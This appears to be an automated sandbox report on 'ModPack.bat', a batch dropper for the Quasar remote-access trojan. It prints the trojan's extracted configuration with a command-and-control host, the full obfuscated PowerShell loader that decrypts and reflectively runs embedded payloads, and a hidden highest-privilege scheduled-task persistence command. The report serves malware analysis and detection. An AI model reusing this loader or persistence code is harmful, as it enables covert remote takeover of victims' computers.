Analysis
-
max time kernel
36s -
max time network
40s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
13-04-2024 20:25
Static task
static1
Behavioral task
behavioral1
Sample
ModPack.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ModPack.bat
Resource
win10v2004-20240412-en
General
-
Target
ModPack.bat
-
Size
1.6MB
-
MD5
3ab2a7793b323765353fa8e597cec156
-
SHA1
c892cc5095ac6f37d0e94bbc09e11abe3d62027a
-
SHA256
a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
-
SHA512
90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
-
SSDEEP
24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea
Malware Config
Extracted
quasar
1.4.1
Office04
notes-creation.gl.at.ply.gg:27030
6735a92b-88d2-4fbe-8e59-605a85072109
-
encryption_key
8681483EF512C654BECF205A0D74FFCA4B129A98
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Trapix Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4728-53-0x000002B6F2C30000-0x000002B6F2F54000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 29 4728 powershell.exe 31 4728 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4876 powershell.exe 4876 powershell.exe 3024 powershell.exe 3024 powershell.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe Token: 34 3024 powershell.exe Token: 35 3024 powershell.exe Token: 36 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe Token: 34 3024 powershell.exe Token: 35 3024 powershell.exe Token: 36 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe Token: 34 3024 powershell.exe Token: 35 3024 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exedescription pid process target process PID 4916 wrote to memory of 4876 4916 cmd.exe powershell.exe PID 4916 wrote to memory of 4876 4916 cmd.exe powershell.exe PID 4876 wrote to memory of 3024 4876 powershell.exe powershell.exe PID 4876 wrote to memory of 3024 4876 powershell.exe powershell.exe PID 4876 wrote to memory of 4364 4876 powershell.exe WScript.exe PID 4876 wrote to memory of 4364 4876 powershell.exe WScript.exe PID 4364 wrote to memory of 3868 4364 WScript.exe cmd.exe PID 4364 wrote to memory of 3868 4364 WScript.exe cmd.exe PID 3868 wrote to memory of 4728 3868 cmd.exe powershell.exe PID 3868 wrote to memory of 4728 3868 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_737_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_737.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_737.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_737.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_737.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_737.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4728
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5f0e4d6a27f7384e815df7e7d9f26794e
SHA1ec71de77f95d30bce9ddfe8ff9850fd2e380c1c9
SHA256bd116cb8748ba555139eb27150521271147442db63776ce75feb039437033fc9
SHA5128b8d32e2acefba80099db5731e504f799d7a784c30ad7ed4b6bc21060431f51b7821b9c9daae71b5ca8343fa2e551d580e397b572ea56872dafce74d0bd27f49
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD53ab2a7793b323765353fa8e597cec156
SHA1c892cc5095ac6f37d0e94bbc09e11abe3d62027a
SHA256a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
SHA51290c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
-
Filesize
115B
MD5450a84f4d8cc45a1b6c1ce4b4e5ac076
SHA1bad873d699d7c54bff2477fab4aa9223023b960e
SHA2567dbda282c9889eb142bf745e6f1744d34be16ec9f3eac6560dc30329a44a45ff
SHA512907b7e7473651ef197c38418af8f24f3d40e43f65d634d4c35990d1e82443b6efa04410b74342cb5b837d94e889b1e16a0299b42ed8e89574cfe4f8204ae40b5